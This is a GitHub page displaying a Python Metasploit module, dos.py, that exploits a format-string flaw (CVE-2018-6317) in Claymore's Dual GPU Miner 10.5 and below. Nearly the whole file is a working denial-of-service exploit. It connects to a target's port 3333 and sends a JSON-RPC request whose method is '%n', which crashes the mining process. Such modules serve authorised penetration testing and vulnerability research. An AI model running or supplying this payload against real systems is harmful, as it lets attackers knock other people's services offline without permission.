-
Notifications
You must be signed in to change notification settings - Fork 1
/
dos.py
executable file
·55 lines (41 loc) · 1.55 KB
/
dos.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
#!/usr/bin/env python
# Note, works with both python 2.7 and 3
import socket
import json
from metasploit import module
metadata = {
'name': 'Claymore Dual GPU Miner Format String dos attack',
'description': '''
Claymore’s Dual GPU Miner 10.5 and below is vulnerable to a format strings vulnerability. This allows an
unauthenticated attacker to read memory addresses, or immediately terminate the mining process causing
a denial of service.
''',
'authors': [
'res1n', # Vulnerability disclosure
'bluebird', # Metasploit external module (Python)
],
'date': '2018-02-06',
'references': [
{'type': 'cve', 'ref': 'CVE-2018-6317'},
{'type': 'url', 'ref': 'https://www.exploit-db.com/exploits/43972/'},
{'type': 'url', 'ref': 'https://github.com/nanopool/Claymore-Dual-Miner'}
],
'type': 'dos',
'options': {
'rhost': {'type': 'address', 'description': 'The target address', 'required': True, 'default': None},
'rport': {'type': 'port', 'description': 'The target port', 'required': True, 'default': 3333},
}}
def run(args):
host = args['rhost']
port = int(args['rport'])
module.log("Creating sockets...", 'info')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
exp = '''{"id": 1,"jsonrpc": "1.0","method": "%n"}'''
try:
s.connect((host, port))
s.send(bytes(exp,'utf-8'))
s.close()
except socket.error:
module.log("connect error exit")
if __name__ == "__main__":
module.run(metadata, run)